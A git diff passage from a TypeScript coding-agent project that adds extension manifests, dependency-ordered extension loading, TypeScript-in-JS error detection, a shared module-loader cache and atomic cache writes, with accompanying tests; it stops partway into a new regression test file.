-import { existsSync, mkdirSync, readFileSync, writeFileSync } from "fs";
+import { existsSync, mkdirSync, readFileSync, renameSync, writeFileSync } from "fs";
 import { dirname, join } from "path";
 import { getAgentDir } from "../config.js";
 import { type DiscoveredModel, getDefaultTTL } from "./model-discovery.js";
@@ -35,6 +35,8 @@ export class ModelDiscoveryCache {
 	}
 
 	set(provider: string, models: DiscoveredModel[], ttlMs?: number): void {
+		// Re-read from disk to get the latest state before modifying
+		this.load();
 		this.data.entries[provider] = {
 			models,
 			fetchedAt: Date.now(),
@@ -50,6 +52,8 @@ export class ModelDiscoveryCache {
 	}
 
 	clear(provider?: string): void {
+		// Re-read from disk to get the latest state before modifying
+		this.load();
 		if (provider) {
 			delete this.data.entries[provider];
 		} else {
@@ -89,7 +93,10 @@ export class ModelDiscoveryCache {
 			if (!existsSync(dir)) {
 				mkdirSync(dir, { recursive: true });
 			}
-			writeFileSync(this.cachePath, JSON.stringify(this.data, null, 2), "utf-8");
+			// Atomic write: write to temp file then rename to avoid partial reads
+			const tmpPath = this.cachePath + ".tmp";
+			writeFileSync(tmpPath, JSON.stringify(this.data, null, 2), "utf-8");
+			renameSync(tmpPath, this.cachePath);
 		} catch {
 			// Silently ignore write failures (read-only FS, permissions, etc.)
 		}
diff --git a/packages/pi-coding-agent/src/core/exec.ts b/packages/pi-coding-agent/src/core/exec.ts
index b7dd046c4..9d12e8c23 100644
--- a/packages/pi-coding-agent/src/core/exec.ts
+++ b/packages/pi-coding-agent/src/core/exec.ts
@@ -39,7 +39,9 @@ export async function execCommand(
 	return new Promise((resolve) => {
 		const proc = spawn(command, args, {
 			cwd,
-			shell: false,
+			// On Windows, npm/npx/tsc etc. are .cmd scripts that require shell
+			// resolution.  Without this, spawn fails with ENOENT or EINVAL (#2854).
+			shell: process.platform === "win32",
 			stdio: ["ignore", "pipe", "pipe"],
 		});
 
diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts
new file mode 100644
index 000000000..3796ab071
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts
@@ -0,0 +1,77 @@
+// GSD-2 — Extension Manifest Tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { readManifest, readManifestFromEntryPath } from "./extension-manifest.js";
+
+describe("readManifest", () => {
+	it("returns null for missing directory", () => {
+		assert.equal(readManifest("/nonexistent/path"), null);
+	});
+
+	it("returns null for directory without manifest", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		assert.equal(readManifest(dir), null);
+	});
+
+	it("returns null for invalid JSON", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		writeFileSync(join(dir, "extension-manifest.json"), "not json{{{", "utf-8");
+		assert.equal(readManifest(dir), null);
+	});
+
+	it("returns null for manifest missing required fields", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		writeFileSync(
+			join(dir, "extension-manifest.json"),
+			JSON.stringify({ id: "test", name: "test" }),
+		);
+		assert.equal(readManifest(dir), null);
+	});
+
+	it("returns valid manifest", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		const manifest = {
+			id: "test-ext",
+			name: "Test Extension",
+			version: "1.0.0",
+			tier: "bundled",
+			requires: { platform: ">=2.29.0" },
+		};
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify(manifest));
+		const result = readManifest(dir);
+		assert.equal(result?.id, "test-ext");
+		assert.equal(result?.tier, "bundled");
+	});
+});
+
+describe("readManifestFromEntryPath", () => {
+	it("reads manifest from parent of entry path", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		const extDir = join(dir, "my-ext");
+		mkdirSync(extDir);
+		writeFileSync(
+			join(extDir, "extension-manifest.json"),
+			JSON.stringify({
+				id: "my-ext",
+				name: "My Extension",
+				version: "1.0.0",
+				tier: "community",
+			}),
+		);
+		writeFileSync(join(extDir, "index.ts"), "");
+
+		const result = readManifestFromEntryPath(join(extDir, "index.ts"));
+		assert.equal(result?.id, "my-ext");
+		assert.equal(result?.tier, "community");
+	});
+
+	it("returns null when entry path parent has no manifest", () => {
+		const dir = mkdtempSync(join(tmpdir(), "ext-manifest-"));
+		assert.equal(readManifestFromEntryPath(join(dir, "index.ts")), null);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts
new file mode 100644
index 000000000..673f5a410
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts
@@ -0,0 +1,62 @@
+// GSD-2 — Extension Manifest: Types and reading for extension-manifest.json
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { existsSync, readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface ExtensionManifest {
+	id: string;
+	name: string;
+	version: string;
+	description: string;
+	tier: "core" | "bundled" | "community";
+	requires: { platform: string };
+	provides?: {
+		tools?: string[];
+		commands?: string[];
+		hooks?: string[];
+		shortcuts?: string[];
+	};
+	dependencies?: {
+		extensions?: string[];
+		runtime?: string[];
+	};
+}
+
+// ─── Validation ─────────────────────────────────────────────────────────────
+
+function isManifest(data: unknown): data is ExtensionManifest {
+	if (typeof data !== "object" || data === null) return false;
+	const obj = data as Record<string, unknown>;
+	return (
+		typeof obj.id === "string" &&
+		typeof obj.name === "string" &&
+		typeof obj.version === "string" &&
+		typeof obj.tier === "string"
+	);
+}
+
+// ─── Reading ────────────────────────────────────────────────────────────────
+
+/** Read extension-manifest.json from a directory. Returns null if missing or invalid. */
+export function readManifest(extensionDir: string): ExtensionManifest | null {
+	const manifestPath = join(extensionDir, "extension-manifest.json");
+	if (!existsSync(manifestPath)) return null;
+	try {
+		const raw = JSON.parse(readFileSync(manifestPath, "utf-8"));
+		return isManifest(raw) ? raw : null;
+	} catch {
+		return null;
+	}
+}
+
+/**
+ * Given an entry path (e.g. `.../extensions/browser-tools/index.ts`),
+ * resolve the parent directory and read its manifest.
+ */
+export function readManifestFromEntryPath(entryPath: string): ExtensionManifest | null {
+	const dir = dirname(entryPath);
+	return readManifest(dir);
+}
diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts
new file mode 100644
index 000000000..30a4b667e
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts
@@ -0,0 +1,134 @@
+// GSD-2 — Extension Sort Tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { sortExtensionPaths } from "./extension-sort.js";
+
+function createExtDir(base: string, id: string, deps?: string[]): string {
+	const dir = join(base, id);
+	mkdirSync(dir, { recursive: true });
+	writeFileSync(
+		join(dir, "extension-manifest.json"),
+		JSON.stringify({
+			id,
+			name: id,
+			version: "1.0.0",
+			tier: "bundled",
+			requires: { platform: ">=2.29.0" },
+			...(deps ? { dependencies: { extensions: deps } } : {}),
+		}),
+	);
+	writeFileSync(join(dir, "index.ts"), `export default function() {}`);
+	return join(dir, "index.ts");
+}
+
+describe("sortExtensionPaths", () => {
+	it("returns empty for empty input", () => {
+		const result = sortExtensionPaths([]);
+		assert.deepEqual(result.sortedPaths, []);
+		assert.deepEqual(result.warnings, []);
+	});
+
+	it("sorts independent extensions alphabetically", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathC = createExtDir(base, "charlie");
+		const pathA = createExtDir(base, "alpha");
+		const pathB = createExtDir(base, "bravo");
+
+		const result = sortExtensionPaths([pathC, pathA, pathB]);
+		assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]);
+		assert.equal(result.warnings.length, 0);
+	});
+
+	it("sorts dependencies before dependents", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathBase = createExtDir(base, "base-ext");
+		const pathDependent = createExtDir(base, "dependent-ext", ["base-ext"]);
+
+		// Pass dependent first — sort should reorder
+		const result = sortExtensionPaths([pathDependent, pathBase]);
+		assert.deepEqual(result.sortedPaths, [pathBase, pathDependent]);
+		assert.equal(result.warnings.length, 0);
+	});
+
+	it("handles deep dependency chains", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathA = createExtDir(base, "a");
+		const pathB = createExtDir(base, "b", ["a"]);
+		const pathC = createExtDir(base, "c", ["b"]);
+
+		const result = sortExtensionPaths([pathC, pathB, pathA]);
+		assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]);
+		assert.equal(result.warnings.length, 0);
+	});
+
+	it("warns about missing dependencies but still loads", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathExt = createExtDir(base, "my-ext", ["nonexistent"]);
+
+		const result = sortExtensionPaths([pathExt]);
+		assert.equal(result.sortedPaths.length, 1);
+		assert.equal(result.sortedPaths[0], pathExt);
+		assert.equal(result.warnings.length, 1);
+		assert.match(result.warnings[0].message, /nonexistent.*not installed/);
+	});
+
+	it("warns about cycles but still loads both", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathA = createExtDir(base, "cycle-a", ["cycle-b"]);
+		const pathB = createExtDir(base, "cycle-b", ["cycle-a"]);
+
+		const result = sortExtensionPaths([pathA, pathB]);
+		assert.equal(result.sortedPaths.length, 2);
+		assert.ok(result.warnings.length > 0);
+		assert.ok(result.warnings.some((w) => w.message.includes("cycle")));
+	});
+
+	it("silently ignores self-dependencies", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const pathExt = createExtDir(base, "self-dep", ["self-dep"]);
+
+		const result = sortExtensionPaths([pathExt]);
+		assert.deepEqual(result.sortedPaths, [pathExt]);
+		assert.equal(result.warnings.length, 0);
+	});
+
+	it("prepends extensions without manifests", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const noManifestDir = join(base, "no-manifest");
+		mkdirSync(noManifestDir, { recursive: true });
+		writeFileSync(join(noManifestDir, "index.ts"), `export default function() {}`);
+		const noManifestPath = join(noManifestDir, "index.ts");
+
+		const pathWithManifest = createExtDir(base, "with-manifest");
+
+		const result = sortExtensionPaths([pathWithManifest, noManifestPath]);
+		assert.equal(result.sortedPaths[0], noManifestPath);
+		assert.equal(result.sortedPaths[1], pathWithManifest);
+	});
+
+	it("handles non-array dependencies gracefully", () => {
+		const base = mkdtempSync(join(tmpdir(), "ext-sort-"));
+		const dir = join(base, "bad-deps");
+		mkdirSync(dir, { recursive: true });
+		writeFileSync(
+			join(dir, "extension-manifest.json"),
+			JSON.stringify({
+				id: "bad-deps",
+				name: "bad-deps",
+				version: "1.0.0",
+				tier: "bundled",
+				dependencies: { extensions: "not-an-array" },
+			}),
+		);
+		writeFileSync(join(dir, "index.ts"), `export default function() {}`);
+
+		const result = sortExtensionPaths([join(dir, "index.ts")]);
+		assert.equal(result.sortedPaths.length, 1);
+		assert.equal(result.warnings.length, 0);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts
new file mode 100644
index 000000000..07a3e67d6
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts
@@ -0,0 +1,137 @@
+// GSD-2 — Extension Sort: Topological dependency ordering
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readManifestFromEntryPath } from "./extension-manifest.js";
+
+export interface SortWarning {
+	declaringId: string;
+	missingId: string;
+	message: string;
+}
+
+export interface SortResult {
+	sortedPaths: string[];
+	warnings: SortWarning[];
+}
+
+/**
+ * Sort extension entry paths in topological dependency-first order using Kahn's BFS algorithm.
+ *
+ * - Extensions without manifests are prepended in input order.
+ * - Missing dependencies produce a structured warning but do not block loading.
+ * - Cycles produce warnings; cycle participants are appended alphabetically.
+ * - Self-dependencies are silently ignored.
+ */
+export function sortExtensionPaths(paths: string[]): SortResult {
+	const warnings: SortWarning[] = [];
+	const pathsWithoutId: string[] = [];
+	const idToPath = new Map<string, string>();
+
+	// Step 1: Build ID map
+	for (const p of paths) {
+		const manifest = readManifestFromEntryPath(p);
+		if (!manifest) {
+			pathsWithoutId.push(p);
+		} else {
+			idToPath.set(manifest.id, p);
+		}
+	}
+
+	// Step 2: Build graph — inDegree and dependents adjacency
+	const inDegree = new Map<string, number>();
+	const dependents = new Map<string, string[]>(); // dep → [ids that depend on dep]
+
+	for (const id of idToPath.keys()) {
+		if (!inDegree.has(id)) inDegree.set(id, 0);
+		if (!dependents.has(id)) dependents.set(id, []);
+	}
+
+	for (const [id, entryPath] of idToPath) {
+		const manifest = readManifestFromEntryPath(entryPath);
+		const rawDeps = manifest?.dependencies?.extensions ?? [];
+		const deps = Array.isArray(rawDeps) ? rawDeps : [];
+
+		for (const depId of deps) {
+			// Silently ignore self-deps
+			if (depId === id) continue;
+
+			if (!idToPath.has(depId)) {
+				// Missing dependency — warn and skip edge
+				warnings.push({
+					declaringId: id,
+					missingId: depId,
+					message: `Extension '${id}' declares dependency '${depId}' which is not installed — loading anyway`,
+				});
+				continue;
+			}
+
+			// Valid edge: id depends on depId → increment inDegree[id], add id to dependents[depId]
+			inDegree.set(id, (inDegree.get(id) ?? 0) + 1);
+			const depDependents = dependents.get(depId) ?? [];
+			depDependents.push(id);
+			dependents.set(depId, depDependents);
+		}
+	}
+
+	// Step 3: Kahn's algorithm — start with nodes that have inDegree 0
+	const sorted: string[] = [];
+	// Ready queue: IDs with inDegree 0, maintained in alphabetical order
+	const ready: string[] = [...idToPath.keys()]
+		.filter((id) => inDegree.get(id) === 0)
+		.sort();
+
+	while (ready.length > 0) {
+		const id = ready.shift()!;
+		sorted.push(idToPath.get(id)!);
+
+		const deps = dependents.get(id) ?? [];
+		for (const depId of deps) {
+			const newDegree = (inDegree.get(depId) ?? 0) - 1;
+			inDegree.set(depId, newDegree);
+			if (newDegree === 0) {
+				// Insert into ready queue maintaining alphabetical order
+				const insertIdx = ready.findIndex((r) => r > depId);
+				if (insertIdx === -1) {
+					ready.push(depId);
+				} else {
+					ready.splice(insertIdx, 0, depId);
+				}
+			}
+		}
+	}
+
+	// Step 4: Cycle handling — any remaining IDs with inDegree > 0
+	const cycleIds = [...idToPath.keys()]
+		.filter((id) => (inDegree.get(id) ?? 0) > 0)
+		.sort();
+
+	if (cycleIds.length > 0) {
+		const cycleSet = new Set(cycleIds);
+
+		for (const id of cycleIds) {
+			const entryPath = idToPath.get(id)!;
+			const manifest = readManifestFromEntryPath(entryPath);
+			const rawDeps = manifest?.dependencies?.extensions ?? [];
+			const deps = Array.isArray(rawDeps) ? rawDeps : [];
+
+			for (const depId of deps) {
+				if (depId === id) continue;
+				if (!cycleSet.has(depId)) continue;
+
+				// Both id and depId are in cycle — emit warning
+				warnings.push({
+					declaringId: id,
+					missingId: depId,
+					message: `Extension '${id}' and '${depId}' form a dependency cycle — loading both anyway (alphabetical order)`,
+				});
+			}
+
+			sorted.push(entryPath);
+		}
+	}
+
+	return {
+		sortedPaths: [...pathsWithoutId, ...sorted],
+		warnings,
+	};
+}
diff --git a/packages/pi-coding-agent/src/core/extensions/index.ts b/packages/pi-coding-agent/src/core/extensions/index.ts
index 0c86d2d72..70525095a 100644
--- a/packages/pi-coding-agent/src/core/extensions/index.ts
+++ b/packages/pi-coding-agent/src/core/extensions/index.ts
@@ -2,6 +2,10 @@
  * Extension system for lifecycle events and custom tools.
  */
 
+export type { ExtensionManifest } from "./extension-manifest.js";
+export { readManifest, readManifestFromEntryPath } from "./extension-manifest.js";
+export type { SortResult, SortWarning } from "./extension-sort.js";
+export { sortExtensionPaths } from "./extension-sort.js";
 export type { SlashCommandInfo, SlashCommandLocation, SlashCommandSource } from "../slash-commands.js";
 export {
 	createExtensionRuntime,
@@ -94,6 +98,11 @@ export type {
 	// Provider Registration
 	ProviderConfig,
 	ProviderModelConfig,
+	LifecycleHookContext,
+	LifecycleHookHandler,
+	LifecycleHookMap,
+	LifecycleHookPhase,
+	LifecycleHookScope,
 	ReadToolCallEvent,
 	ReadToolResultEvent,
 	// Commands
@@ -141,6 +150,8 @@ export type {
 	// Events - User Bash
 	UserBashEvent,
 	UserBashEventResult,
+	BashTransformEvent,
+	BashTransformEventResult,
 	WidgetPlacement,
 	WriteToolCallEvent,
 	WriteToolResultEvent,
diff --git a/packages/pi-coding-agent/src/core/extensions/loader.test.ts b/packages/pi-coding-agent/src/core/extensions/loader.test.ts
index ef98c1189..da547e525 100644
--- a/packages/pi-coding-agent/src/core/extensions/loader.test.ts
+++ b/packages/pi-coding-agent/src/core/extensions/loader.test.ts
@@ -4,6 +4,7 @@ import * as fs from "node:fs";
 import * as os from "node:os";
 import * as path from "node:path";
 import { isProjectTrusted, trustProject, getUntrustedExtensionPaths } from "./project-trust.js";
+import { containsTypeScriptSyntax, loadExtensions, resetExtensionLoaderCache } from "./loader.js";
 
 // ─── helpers ──────────────────────────────────────────────────────────────────
 
@@ -139,3 +140,136 @@ describe("getUntrustedExtensionPaths", () => {
 		assert.deepEqual(result, paths);
 	});
 });
+
+// ─── containsTypeScriptSyntax ─────────────────────────────────────────────────
+
+describe("containsTypeScriptSyntax", () => {
+	it("detects parameter type annotations", () => {
+		assert.ok(containsTypeScriptSyntax(`export default function activate(api: ExtensionAPI) {}`));
+	});
+
+	it("detects interface declarations", () => {
+		assert.ok(containsTypeScriptSyntax(`interface Config { name: string; }`));
+	});
+
+	it("detects type alias declarations", () => {
+		assert.ok(containsTypeScriptSyntax(`type Handler = (event: string) => void;`));
+	});
+
+	it("detects enum declarations", () => {
+		assert.ok(containsTypeScriptSyntax(`enum Direction { Up, Down, Left, Right }`));
+	});
+
+	it("detects return type annotations", () => {
+		assert.ok(containsTypeScriptSyntax(`function foo(): Promise<void> {}`));
+	});
+
+	it("detects generic type parameters on functions", () => {
+		assert.ok(containsTypeScriptSyntax(`function identity<T>(arg) { return arg; }`));
+	});
+
+	it("detects variable type annotations", () => {
+		assert.ok(containsTypeScriptSyntax(`const name: string = "hello";`));
+	});
+
+	it("returns false for plain JavaScript", () => {
+		assert.equal(containsTypeScriptSyntax(`export default function activate(api) { api.on("init", () => {}); }`), false);
+	});
+
+	it("returns false for empty string", () => {
+		assert.equal(containsTypeScriptSyntax(""), false);
+	});
+
+	it("returns false for JSDoc comments with type-like syntax", () => {
+		// JSDoc uses different syntax: @param {string} name
+		assert.equal(containsTypeScriptSyntax(`/** @param {string} name */\nexport default function activate(api) {}`), false);
+	});
+});
+
+// ─── loadExtensions: TypeScript syntax in .js files ───────────────────────────
+
+describe("loadExtensions", () => {
+	let tmpDir: string;
+
+	beforeEach(() => {
+		tmpDir = makeTempDir();
+	});
+
+	afterEach(() => {
+		cleanDir(tmpDir);
+	});
+
+	it("reports helpful error when .js file contains TypeScript syntax", async () => {
+		// Create a .js file that uses TypeScript type annotations
+		const extPath = path.join(tmpDir, "my-extension.js");
+		fs.writeFileSync(
+			extPath,
+			`export default function activate(api: ExtensionAPI) {\n  api.on("init", async () => {});\n}\n`,
+		);
+
+		const result = await loadExtensions([extPath], tmpDir);
+
+		assert.equal(result.errors.length, 1);
+		const errorMsg = result.errors[0].error;
+		// The error should mention TypeScript syntax and suggest .ts extension
+		assert.ok(
+			/TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg),
+			`Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`,
+		);
+	});
+
+	it("reports helpful error when .js file contains TS interface declaration", async () => {
+		const extPath = path.join(tmpDir, "typed-ext.js");
+		fs.writeFileSync(
+			extPath,
+			`interface Config { name: string; }\nexport default function activate(api) { return; }\n`,
+		);
+
+		const result = await loadExtensions([extPath], tmpDir);
+
+		assert.equal(result.errors.length, 1);
+		const errorMsg = result.errors[0].error;
+		assert.ok(
+			/TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg),
+			`Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`,
+		);
+	});
+});
+
+// ─── resetExtensionLoaderCache ───────────────────────────────────────────────
+
+describe("resetExtensionLoaderCache", () => {
+	let tmpDir: string;
+
+	beforeEach(() => {
+		tmpDir = makeTempDir();
+		// Always start with a clean cache so tests are independent
+		resetExtensionLoaderCache();
+	});
+
+	afterEach(() => {
+		resetExtensionLoaderCache();
+		cleanDir(tmpDir);
+	});
+
+	it("clears the jiti singleton so a fresh instance is created on next load", async () => {
+		// Write a minimal valid extension that returns a name
+		const extPath = path.join(tmpDir, "cache-ext.ts");
+		fs.writeFileSync(
+			extPath,
+			`export default function activate(api: any) { return { name: "cache-ext" }; }\n`,
+		);
+
+		// First load — creates the jiti singleton and caches the module
+		const result1 = await loadExtensions([extPath], tmpDir);
+		assert.equal(result1.extensions.length, 1, "first load should succeed");
+
+		// Reset the cache — nulls the singleton
+		resetExtensionLoaderCache();
+
+		// Second load — should create a new jiti instance (not reuse the old one)
+		// and still successfully load the extension
+		const result2 = await loadExtensions([extPath], tmpDir);
+		assert.equal(result2.extensions.length, 1, "load after reset should succeed with fresh jiti");
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/extensions/loader.ts b/packages/pi-coding-agent/src/core/extensions/loader.ts
index 88272e87b..7e25c837d 100644
--- a/packages/pi-coding-agent/src/core/extensions/loader.ts
+++ b/packages/pi-coding-agent/src/core/extensions/loader.ts
@@ -42,6 +42,7 @@ import type {
 	Extension,
 	ExtensionAPI,
 	ExtensionFactory,
+	LifecycleHookHandler,
 	ExtensionRuntime,
 	LoadExtensionsResult,
 	MessageRenderer,
@@ -427,6 +428,8 @@ export function createExtensionRuntime(): ExtensionRuntime {
 		unregisterProvider: (name) => {
 			runtime.pendingProviderRegistrations = runtime.pendingProviderRegistrations.filter((r) => r.name !== name);
 		},
+		// Stub replaced by ExtensionRunner at construction time via bindEmitMethods().
+		emitBeforeModelSelect: async () => undefined,
 	};
 
 	return runtime;
@@ -463,6 +466,22 @@ function createExtensionAPI(
 			extension.commands.set(name, { name, ...options });
 		},
 
+		registerBeforeInstall(handler: LifecycleHookHandler): void {
+			extension.lifecycleHooks.beforeInstall.push(handler);
+		},
+
+		registerAfterInstall(handler: LifecycleHookHandler): void {
+			extension.lifecycleHooks.afterInstall.push(handler);
+		},
+
+		registerBeforeRemove(handler: LifecycleHookHandler): void {
+			extension.lifecycleHooks.beforeRemove.push(handler);
+		},
+
+		registerAfterRemove(handler: LifecycleHookHandler): void {
+			extension.lifecycleHooks.afterRemove.push(handler);
+		},
+
 		registerShortcut(
 			shortcut: KeyId,
 			options: {
@@ -562,17 +581,102 @@ function createExtensionAPI(
 			runtime.unregisterProvider(name);
 		},
 
+		async emitBeforeModelSelect(event: Omit<import("./types.js").BeforeModelSelectEvent, "type">): Promise<import("./types.js").BeforeModelSelectResult | undefined> {
+			return runtime.emitBeforeModelSelect(event);
+		},
+
 		events: eventBus,
 	} as ExtensionAPI;
 
 	return api;
 }
 
+/**
+ * Heuristic patterns that indicate TypeScript syntax in a source file.
+ * Used to detect when a .js file accidentally contains TypeScript code
+ * and provide a helpful error message instead of a cryptic parse failure.
+ */
+const TS_SYNTAX_PATTERNS: RegExp[] = [
+	// Variable type annotations: const name: string, let count: number
+	/\b(?:const|let|var)\s+\w+\s*:\s*(?:string|number|boolean|any|void|never|unknown|object|bigint|symbol|undefined|null)\b/,
+	// Parameter type annotations: (api: ExtensionAPI)
+	/\(\s*\w+\s*:\s*[A-Z]\w*/,
+	// Return type annotations: ): Promise<void> {  or  ): string =>
+	/\)\s*:\s*(?:Promise|string|number|boolean|void|any|never|unknown)\b/,
+	// Interface declarations
+	/\binterface\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*\{/,
+	// Type alias declarations
+	/\btype\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*=/,
+	// Angle-bracket type assertions: <Type>value
+	/(?:as\s+\w+(?:<[^>]*>)?)\s*[;,)\]}]/,
+	// Generic type parameters on functions: function foo<T>
+	/\bfunction\s+\w+\s*<[^>]+>/,
+	// Enum declarations
+	/\benum\s+[A-Z]\w*\s*\{/,
+];
+
+/**
+ * Check whether a source string likely contains TypeScript syntax.
+ * This is a heuristic — it may produce false positives for unusual JS,
+ * but is tuned to catch the most common TS-in-JS mistakes.
+ */
+export function containsTypeScriptSyntax(source: string): boolean {
+	return TS_SYNTAX_PATTERNS.some((pattern) => pattern.test(source));
+}
+
+/**
+ * Shared jiti instance for loading extension modules.
+ *
+ * Before this fix (#2108), each extension created a NEW jiti instance with
+ * `moduleCache: false`, causing shared dependencies (e.g. @gsd/pi-agent-core)
+ * to be recompiled for every extension — turning a ~3s parallel load into a
+ * ~15-30s serial compilation bottleneck.
+ *
+ * Using a single shared instance with `moduleCache: true` means shared modules
+ * are compiled once and reused across all extensions.
+ */
+let _extensionLoaderJiti: ReturnType<typeof createJiti> | null = null;
+
+/**
+ * Reset the shared jiti singleton so the next call to getExtensionLoaderJiti()
+ * creates a fresh instance.  This prevents memory leaks in long-running daemon
+ * processes (every loaded module stays cached forever) and ensures stale modules
+ * are not returned when extension source changes on disk.
+ */
+export function resetExtensionLoaderCache(): void {
+	_extensionLoaderJiti = null;
+}
+
+function getExtensionLoaderJiti() {
+	if (!_extensionLoaderJiti) {
+		_extensionLoaderJiti = createJiti(import.meta.url, {
+			moduleCache: true,
+			...getJitiOptions(),
+		});
+	}
+	return _extensionLoaderJiti;
+}
+
 async function loadExtensionModule(extensionPath: string) {
-	const jiti = createJiti(import.meta.url, {
-		moduleCache: false,
-		...getJitiOptions(),
-	});
+	// Pre-compiled extension loading: if the source is .ts and a sibling .js
+	// file exists with matching or newer mtime, use native import() to skip
+	// jiti JIT compilation entirely.  This is the biggest startup win for
+	// bundled extensions that have already been built.
+	if (extensionPath.endsWith(".ts")) {
+		const jsPath = extensionPath.replace(/\.ts$/, ".js");
+		try {
+			const [tsStat, jsStat] = [fs.statSync(extensionPath), fs.statSync(jsPath)];
+			if (jsStat.mtimeMs >= tsStat.mtimeMs) {
+				const module = await import(jsPath);
+				const factory = (module.default ?? module) as ExtensionFactory;
+				return typeof factory !== "function" ? undefined : factory;
+			}
+		} catch {
+			// .js file doesn't exist or stat failed — fall through to jiti
+		}
+	}
+
+	const jiti = getExtensionLoaderJiti();
 
 	const module = await jiti.import(extensionPath, { default: true });
 	const factory = module as ExtensionFactory;
@@ -632,6 +736,12 @@ function createExtension(extensionPath: string, resolvedPath: string): Extension
 		commands: new Map(),
 		flags: new Map(),
 		shortcuts: new Map(),
+		lifecycleHooks: {
+			beforeInstall: [],
+			afterInstall: [],
+			beforeRemove: [],
+			afterRemove: [],
+		},
 	};
 }
 
@@ -654,6 +764,22 @@ async function loadExtension(
 				return { extension: null, error: null };
 			}
 			logExtensionTiming(extensionPath, Date.now() - start, "failed");
+
+			// Check if a .js file contains TypeScript syntax
+			if (resolvedPath.endsWith(".js")) {
+				try {
+					const source = fs.readFileSync(resolvedPath, "utf-8");
+					if (containsTypeScriptSyntax(source)) {
+						return {
+							extension: null,
+							error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. Rename it to .ts so the loader can compile it.`,
+						};
+					}
+				} catch {
+					// Could not read file — fall through to generic error
+				}
+			}
+
 			return { extension: null, error: `Extension does not export a valid factory function: ${extensionPath}` };
 		}
 
@@ -666,6 +792,23 @@ async function loadExtension(
 	} catch (err) {
 		const message = err instanceof Error ? err.message : String(err);
 		logExtensionTiming(extensionPath, Date.now() - start, "failed");
+
+		// Check if a .js file contains TypeScript syntax — the parse error from
+		// jiti/Node is often cryptic, so surface a clearer diagnostic.
+		if (resolvedPath.endsWith(".js")) {
+			try {
+				const source = fs.readFileSync(resolvedPath, "utf-8");
+				if (containsTypeScriptSyntax(source)) {
+					return {
+						extension: null,
+						error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. Rename it to .ts so the loader can compile it.`,
+					};
+				}
+			} catch {
+				// Could not read file — fall through to generic error
+			}
+		}
+
 		return { extension: null, error: `Failed to load extension: ${message}` };
 	}
 }
@@ -834,6 +977,11 @@ function discoverExtensionsInDir(dir: string): string[] {
 
 /**
  * Discover and load extensions from standard locations.
+ *
+ * @deprecated Use DefaultResourceLoader.reload() instead — this function is
+ * not called in the GSD loading flow. Extension discovery happens through
+ * DefaultPackageManager.resolve() → addAutoDiscoveredResources(). Kept for
+ * backwards compatibility with direct pi-coding-agent consumers.
  */
 export async function discoverAndLoadExtensions(
 	configuredPaths: string[],
diff --git a/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts
new file mode 100644
index 000000000..2679feae6
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts
@@ -0,0 +1,81 @@
+// GSD2 — Regression test: pendingProviderRegistrations must be flushed exactly once (#3576)
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+/**
+ * This test validates that the provider preflush pattern in sdk.ts clears
+ * pendingProviderRegistrations after iterating, so bindCore() doesn't
+ * re-register the same providers.
+ *
+ * The bug: createAgentSession() iterated pendingProviderRegistrations but
